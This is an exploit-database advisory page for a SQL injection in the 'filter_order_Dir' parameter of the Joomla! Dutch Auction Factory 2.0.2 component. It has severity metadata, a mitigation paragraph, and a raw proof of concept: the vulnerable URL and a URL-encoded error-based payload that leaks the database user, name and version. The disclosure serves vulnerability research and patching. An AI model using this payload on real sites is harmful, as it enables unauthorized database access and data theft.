header-logo
Suggest Exploit
vendor:
Dutch Auction Factory
by:
Ihsan Sencan
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Dutch Auction Factory
Affected Version From: 2.0.2
Affected Version To: 2.0.2
Patch Exists: NO
Related CWE: N/A
CPE: a:thephpfactory:dutch_auction_factory:2.0.2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

Joomla! Component Dutch Auction Factory 2.0.2 – ‘filter_order_Dir’ SQL Injection

Joomla! Component Dutch Auction Factory 2.0.2 is vulnerable to a SQL injection vulnerability in the 'filter_order_Dir' parameter. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable parameter. This can allow the attacker to gain access to sensitive information from the database.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Joomla! Component Dutch Auction Factory 2.0.2 - 'filter_order_Dir' SQL Injection
# Dork: N/A
# Exploit Author: Ihsan Sencan
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/dutch-auction-factory/
# Version: 2.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1) http://localhost/[PATH]/index.php?option=com_dutchfactory&task=showSearchResults&filter_order_Dir=[SQL]&filter_order=[SQL]
 
%2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29